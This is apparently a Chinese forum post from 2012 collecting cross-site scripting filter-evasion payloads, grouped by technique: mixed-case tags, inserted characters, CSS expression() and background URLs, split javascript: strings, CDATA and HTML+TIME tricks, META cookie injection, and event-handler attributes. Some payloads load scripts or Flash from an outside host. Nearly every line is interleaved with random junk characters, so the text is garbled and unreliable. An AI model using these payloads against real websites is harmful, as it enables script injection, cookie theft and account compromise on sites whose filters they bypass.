1. 改变字符大小写
8 b, D2 C/ Q7 G$ u' m- N0 @" T7 H$ @) K( [8 J: ^. Q. `
0 m# I' T% H$ k: R: B2 }/ G- N0 \( v& U
<sCript>alert(‘d’)</scRipT>: z( }, A W9 i, {% _
9 y" C3 o) U+ A! a# n! T7 Q' ^9 {2. 利用多加一些其它字符来规避Regular Expression的检查. J# Z+ h* B# p9 V
% j0 x/ M; y( R$ k
<<script>alert(‘c’)//<</script>$ T* Q& A5 t) g" C9 f7 _; q
9 l# ]$ w1 `4 \/ s I <SCRIPT a=">" SRC="t.js"></SCRIPT>6 Z6 t) v, U9 C; V8 C
. F- d/ B4 x+ ]& Z3 @; t
<SCRIPT =">" SRC="t.js"></SCRIPT>
, c, H, {5 O# o: ~4 e6 }8 ~
" b' |/ O E, t7 \1 ] <SCRIPT a=">" ” SRC="t.js"></SCRIPT>6 j1 P9 M7 v; S6 _5 K
, h" b& q9 p9 [! e <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>! n. g8 ?( \! o! Q$ y
9 _/ H! ~& l( Q. Q$ e6 k6 s
<SCRIPT a=`>` SRC="t.js"></SCRIPT>3 M! ?7 j5 |5 F& E3 m7 y {
+ R4 x' i0 U+ d3 o
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
. t6 h) n( I2 \6 k- M. Z3 J( D5 }( U* f" k
3. 以其它扩展名取代.js+ ?+ ^ J @' P8 V, f$ I
: z! }4 m6 u% f, l <script src="bad.jpg"></script>) y0 S: Q" ]8 H9 N
1 o; Z, S, c+ f/ ?1 U
4. 将Javascript写在CSS档里$ |$ x' P4 |; u/ c7 n
* M, d" K8 O; [! V$ ^# g' z, S5 x <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
* n- h/ y0 Z. n {6 z* i7 d
; u( J, }- i- U5 }& M example:5 N% b/ t, c4 W4 O0 B3 ?# j
6 j. |& f+ k( G; E9 L body {+ e8 e8 I; t0 _' U! } `0 o
9 V: e) p4 v: g1 i) A0 v+ F
background-image: url(‘javascript:alert("XSS");’)9 B: Y2 V* \! W, y
( G2 g. G; z9 q* ]1 g }
4 H7 ]. ?$ @, ^ R3 U; i% _( Y4 r
* s4 }, s$ y- L! x# [5. 在script的tag里加入一些其它字符5 u- p9 e* Z+ k, Y
4 [9 q; G) T8 c3 `: ]0 m <SCRIPT/SRC="t.js"></SCRIPT>9 y4 U8 L9 e% z5 i D3 T+ W' V
" h: x: L& T b/ p/ \7 W <SCRIPT/anyword SRC="t.js"></SCRIPT>
! @7 b5 Q7 ~! t. Q" v; w0 I8 x5 _9 K5 j
6. 使用tab或是new line来规避* h$ f0 v/ s, B. x+ |( [$ w
" K: R+ X9 Y- R9 q/ D8 w5 d
<img src="jav ascr ipt:alert(‘XSS3′)">% S' K% O5 }. r! \7 ~
. S, P9 b* z6 s, ~! x
<img src="jav ascr ipt:alert(‘XSS3′)">0 o! l: c$ x/ B, N) l! V
; Q% [ U- @5 Z O3 V5 S <IMG SRC="jav ascript:alert(‘XSS’);">" o" S4 I' C" \8 \
! |# z, u) N: M8 w1 M
-> tag
. `( s8 _) M+ @: ^
. W) M- p- O0 {' H -> new line+ r# o( t" r0 U& h8 F
" g3 [- ~9 g: |9 c5 @
7. 使用"\"来规避
% r8 N% o! K* _- c6 Z. A
- P/ I5 b8 Z' Y% r( C <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
. s) M0 j" r( s8 z. \5 H
4 H; U" J, u% v: z <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>/ M; S$ E: Y! h3 k( @+ z3 c# p+ F
' |7 U- D' k) x r+ L
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">, o3 `( |' {* E6 v9 u2 d
; c: w G, C$ N |+ j7 q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">* X2 x3 K6 n7 f$ w. I; j2 F/ m$ {% |
, ^4 P' w' D( J" ]& ~ <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
4 f/ M2 f$ n% s7 P/ P [7 F8 }. O1 f
8. 使用Hex encode来规避(也可能会把";"拿掉)+ j$ R, y: }& y6 u
' G6 K- p" C/ r5 N8 e- H, Q5 a. } <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 | Q/ e4 ~1 |" ?0 {
/ p5 d8 ]9 Q( i' T6 | C 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 w9 Y( I2 Z/ |) l! I, d/ k6 h1 Y* q: v6 c, D C, o
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
% Q" w8 F7 Z% e% c/ X( r2 E6 C+ z/ U
: {6 b( [! `* {) m# l 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
5 r2 ?0 u' i+ j) E( A
$ D; b0 n( A, O" b9 }- ?) g9. script in HTML tag4 [# I" \; G) T- f5 ]
5 |/ z6 A. G3 `3 J# A& j5 S- t
<body onload=」alert(‘onload’)」>" F+ y$ K2 X7 S
. P! j v& d# U+ w- K5 ^: M onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
$ M+ t: \5 q0 |, ~# r# n9 S/ h9 d
# s; k- J( r3 } ~% [8 j r+ I10. 在swf里含有xss的code
$ w L# r9 |9 T; m0 `6 L, I. b. O$ R( @7 J0 u9 c
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
2 r, V, |( T9 X. C
- x6 F: w, k# {4 e7 u11. 利用CDATA将xss的code拆开,再组合起来。
& I- a& c1 {6 O# r, j- \; R( \/ y9 ] D6 r% x7 F. n
<XML ID=I><X><C>
- ~8 g% j1 T4 S2 T+ R( N+ j! @; T9 C4 M" \% |! ?1 V, w& s
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>: G# X0 F- H- K* b8 @+ w6 Y3 O! s/ ?
3 a7 j* e. V9 {) P </C></X>' H4 o1 _6 Q5 f3 u
; s6 w j. f# h+ c </xml>
( i9 l" A5 o1 T0 a/ V2 H8 {7 D8 l. R7 [. I
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
! c7 K( z6 Q6 C7 A/ O9 I t, E0 ]* J8 |* j& D- P! ^, I
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
0 s: I( I3 u4 y ~( C
3 i8 s3 z4 F/ V" U7 n1 O/ ^ <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>/ N$ c% l q& Z, {! t) }1 e
1 f% X) b/ a4 ]- i
12. 利用HTML+TIME。& v" B" n) S; p$ H% F
8 `+ o) i9 B! B$ Y/ {
<HTML><BODY>( G# T: Y3 z) k. _" j
! \/ s. j5 H' ?0 w0 T3 N <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
0 D6 m5 K, H# @6 ?0 T: W0 Q+ }: }/ l7 w, S3 V2 b. W3 |
<?import namespace="t" implementation="#default#time2">
" s. ^3 J T( K) {6 Q. e% E8 y* J; L+ P3 ^$ ~+ y0 ~
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">0 \/ Y9 ?+ B' @+ q/ P; e
" J8 X7 d4 l+ m: V </BODY></HTML>
. r3 v4 b7 _' R H* ]! D9 C1 _
9 z: a: r7 `) m) r9 |$ _' N13. 透过META写入Cookie。
4 h) D$ X( C7 m5 P0 y- b1 z6 ]) e/ q: c; |6 K
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
5 L% ^' W* O3 U2 } L/ G* C6 g0 ^
3 j$ c' P1 K1 ^# Q+ i9 ?$ [9 A14. javascript in src , href , url
3 v7 K: h! v) p3 G2 `( S: y
! B/ Z1 e& x4 ?6 L5 A <IFRAME SRC=javascript:alert(’13′)></IFRAME>
5 Y" M4 T- k5 e+ _7 H4 V: Q1 z# o
1 G, ~ p; D3 `! z' B <img src="javascript:alert(‘XSS3′)">
) v9 h+ _2 v) }# O% h. k9 |1 g; j \4 H* t% K! r9 R$ Y
<IMG DYNSRC="javascript:alert(‘XSS20′)">* u2 {: h9 h4 {5 B: E/ C7 p
+ M; n+ u- o' @& B <IMG LOWSRC="javascript:alert(‘XSS21′)">3 _/ h/ Q, k& q+ X' W
* G5 {5 T% N, R0 e' k <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
. K% w# m/ X2 j/ A0 r. g; H e0 Z- h0 x, h0 ^8 g) I9 R& P
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
/ S1 T8 Q$ o6 Q# W' x& W2 [* X3 U8 v1 z+ {# f% A( }9 a: P8 q) o
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 l8 T8 K; P) ?$ w: m
" \. s- p9 D! E& X' t <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
/ t4 Q* s7 o. L' F4 {% E* C* U9 G: L0 D- w! B, y) _
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
5 x' o7 c+ @) y) o# J
, ^; F5 h1 l# w' i0 F0 M# D6 H </STYLE><A CLASS=XSS></A>2 B# N2 ?4 O1 G6 e
$ p5 g% I- I: z& U$ W1 e <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
3 e1 B- B) w% `: z
! N9 S R* _, O5 a/ z# d |
发表于 2012-12-31 09:59:28
收藏
支持
反对